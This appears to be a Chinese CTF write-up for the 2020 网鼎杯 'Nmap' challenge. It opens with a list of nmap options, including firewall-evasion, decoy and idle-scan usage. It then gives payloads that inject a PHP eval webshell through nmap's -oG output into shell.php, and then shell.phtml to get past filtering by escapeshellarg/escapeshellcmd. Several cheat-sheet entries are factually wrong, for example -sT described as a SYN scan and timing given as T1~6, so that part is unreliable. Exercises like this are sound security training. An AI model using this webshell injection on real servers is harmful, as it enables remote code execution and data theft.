[网鼎杯 2020 朱雀组]Nmap

[网鼎杯 2020 朱雀组]Nmap

nmap使用语句说明：

nmap -v 127.0.0.1 给出了远程机器更详细的信息，显示冗余信息(扫描细节)
nmap -iL nmaptest.txt 运行带“iL” 选项的nmap命令来扫描文件中列出的所有IP地址
nmap 192.168.0.* --exclude 192.168.0.100 使用“-exclude”选项来排除某些你不想要扫描的主机
nmap -A 192.168.0.101 启用操作系统和版本检测，脚本扫描和路由跟踪功能
nmap -O 127.0.0.1 使用选项“-O”和“-osscan-guess”也帮助探测操作系统信息
nmap -sA 192.168.0.101 扫描远程主机以探测该主机是否使用了包过滤器或防火墙
nmap -PN 192.168.0.101 扫描主机检测其是否受到数据包过滤软件或防火墙的保护
nmap -sP 192.168.0.* 找出网络中的在线主机
nmap -F 192.168.0.101 快速扫描，仅扫描nmap-services文件中的端口而避开所有其它的端口
nmap -f 192.168.96.4 使用小数据包发送，避免被识别出
nmap -r 192.168.0.101 不会随机的选择端口扫描
nmap -p 80,443 192.168.0.101 使用“-P”选项指定你想要扫描的端口
nmap -sV 192.168.0.101 查找主机服务版本号
nmap -PS 192.168.0.101 使用TCP ACK和TCP Syn方法来扫描远程主机（防火墙会阻断标ICMP包）
nmap -Pn 192.168.96.4 目标机禁用ping，绕过ping扫描
nmap -sn 192.168.96.4 对目标进行ping检测，不进行端口扫描（发送四种报文确定目标是否存活）
nmap -sS 192.168.0.101 执行一次隐蔽的扫描，安全，快
nmap -sT 192.168.0.101 使用TCP Syn扫描最常用的端口，不安全，慢
nmap -sN 192.168.0.101 执行TCP空扫描以骗过防火墙
nmap -sI 僵尸ip 目标ip 使用僵尸机对目标机发送数据包
nmap 192.168.96.4 -oX myscan.xml 对扫描结果另存在myscan.xml
nmap -T1~6 192.168.96.4 设置扫描速度，一般T4足够
nmap –mtu 192.168.96.4 发送的包大小,最大传输单元必须是8的整数
nmap -D <假ip> 192.168.96.4 发送参杂着假ip的数据包检测
继续中断扫描：
nmap –oG 1.txt –v 192.168.1.1/24 -oG将扫描结果保存为TXT，Ctrl+C中断扫描
Nmap –resume 1.txt 作用：继续扫描

nmap保存文件：

nmap可以将扫描后的结果保存为文件，文件格式可以由自己设置，所以我们可以尝试写入一句话木马

' <?php @eval($_POST['r1']); ?> -oG shell.php '

报hacker 说明可能做了过滤，可能过滤了php字段
<?php 使用 短标签<?php代替

使用.phtml后缀尝试

payload:' <?= @eval($_POST["r1"]); ?> -oG shell.phtml '
注意：这里POST中要使用双引号，单引号会出错，参考其他大佬的说这里由excapeshellarg()和escapeshellcmd()两个函数的过滤
过滤分析参考：wp-excapeshellarg()和escapeshellcmd()

访问，能够解析

直接列出根目录：

找到flag 进行读取：